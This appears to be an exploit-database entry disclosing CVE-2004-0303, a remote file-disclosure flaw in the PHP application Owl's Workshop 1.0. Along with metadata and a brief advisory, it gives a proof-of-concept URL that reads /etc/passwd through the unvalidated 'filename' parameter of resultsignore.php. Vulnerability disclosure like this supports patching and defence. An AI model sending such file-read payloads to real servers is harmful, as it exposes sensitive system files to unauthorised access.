Fool's Workshop Owl's Workshop 1.0 - 'resultsignore.php' Arbitrary File Access
Author: G00db0y type: webapps platform: php port: date_added: 2004-02-18 date_updated: 2012-12-28 verified: 1 codes: CVE-2004-0303;OSVDB-4005 tags: aliases: screenshot_url: application_url: raw file: 23727.txt
source: https://www.securityfocus.com/bid/9689/info Owl's Workshop is reported prone to multiple remote file-disclosure vulnerabilities because the application fails to validate user-supplied input passed via a URI parameter. Upon successful exploitation of these issues, an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks. http://www.example.org/owls/multiplechoice/resultsignore.php?filename=/etc/passwd